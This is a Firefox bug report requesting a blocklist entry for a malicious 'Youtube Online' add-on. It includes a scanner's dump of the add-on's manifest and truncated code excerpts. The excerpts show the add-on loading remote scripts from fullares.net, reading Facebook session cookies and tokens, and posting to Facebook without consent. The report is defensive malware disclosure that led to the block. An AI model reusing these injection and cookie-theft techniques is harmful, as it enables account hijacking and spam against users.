Closed
Bug 728476
Opened 12 years ago
Closed 12 years ago
Malicious "Youtube Online" add-on
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Details
Attachments
(1 file)
31.04 KB,
application/octet-stream
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 Steps to reproduce: Downloaded the add-on from http://facebookmusica.com/youtube.xpi Actual results: Report for http://facebookmusica.com/youtube.xpi ** Embedded and Remote Files ** chrome.manifest content/prefman.js content/skin/icon.png content/script-compiler.js content/youtube.js http://fullares.net/campanita/script.js http://fullares.net/campanita/extra.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul install.rdf ** Embedded Metadata ** <em:name>Youtube Online</em:name> <em:version>1.4.0</em:version> <em:targetApplication> <em:minVersion>2.0</em:minVersion> <em:maxVersion>10.*</em:maxVersion> </em:targetApplication> <em:creator>YOUTU</em:creator> <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> <em:description>Ve videos youtube mas rapido y ligero</em:description> <em:homepageURL>http://poringa.me/</em:homepageURL> <em:updateURL>http://http/://poringa.me/update.rdf</em:updateURL> ...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR 0YC1g/Mo... ** Files Loaded ** ...overlay chrome://browser/content/browser.xul chrome://youtube/content/sc ript-com... 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> ** Remote Javascript Loaded ** ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://fullares.net/campanita/script.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://fullares.net/campanita/extra.js"); ...ppendChild|cl|oo|createElement|function|script|onload|no|javascript|type |js|php|... var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... <Description about="urn:mozilla:install-manifest"> <Description> </Description> <em:description>Ve videos youtube mas rapido y ligero</em:description> </Description> ** Facebook Paths Accessed ** ...(location.href.match(/^http:\/\/(www\.)?facebook.com/i)){ window.location = 'htt... ...=new XMLHttpRequest();gf['open']('GET','/ajax/typeahead/first_degree.php?__a=1&f ... ...=new XMLHttpRequest();var d='http://www.facebook.com/ajax/profile/composer.php?_... ...(location.href.match(/^http:\/\/(www\.)?facebook.com/i)){var cook=readCookie("fv... ** Facebook Cookies Accessed ** ...n fb_comparte(){var user_id=readCookie('c_user');var uid=user_id;if(document['ge... ...yName']('post_form_id')[0]['value'];var fb_dtsg=document['getElementsByName']('f... ...g';var e='post_form_id='+post_form_id+'&fb_dtsg='+fb_dtsg+'&xhpc_composerid=u574.. . ...var user_id=readCookie('c_user');if(user_id==null)return false;cook=readCookie("... ** HTTP Requests ** ...n video??'];var message='';var a;gf=new XMLHttpRequest();gf['open']('GET','/ajax... ...randomValue(p3)]['join'](' ');var c=new XMLHttpRequest();var d='http://www.faceb/... var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ ....)?facebook.com/i)){ window.location = 'http://poringa.me/facebook.html'; } blogs[0] = 'http://www.quebuenamusica.org/campanita/'; blogs[1] = 'http://bit.ly/uDUmmB'; blogs[2] = 'http://bit.ly/s7SPp7'; ...){ifra.style.marginLeft="0px";ifra.src="http://voltor.info/video/video.h tml"} ...L='<iframe id="change" width="500" src="http://fullares.net/campanita/unlock.php... ...alue'];var video_url=blog;var domains=['http://i40.tinypic.com/8zenw6.png'];var ... ...(' ');var c=new XMLHttpRequest();var d='http://www.facebook.com/ajax/profile/com... s.setAttribute("src", "http://fullares.net/campanita/extra.js"); s.setAttribute("src", "http://fullares.net/campanita/script.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul< /code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/. .. ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#"> <em:homepageURL>http://poringa.me/</em:homepageURL> <em:updateURL>http://http/://poringa.me/update.rdf</em:updateURL> Expected results: It should not steal your Facebook cookies and post to Facebook without your consent.
Assignee | ||
Comment 1•12 years ago
|
||
ID: youtube2@youtube2.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Assignee | ||
Comment 2•12 years ago
|
||
https://addons.mozilla.org/en-US/firefox/blocked/i67
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Updated•8 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•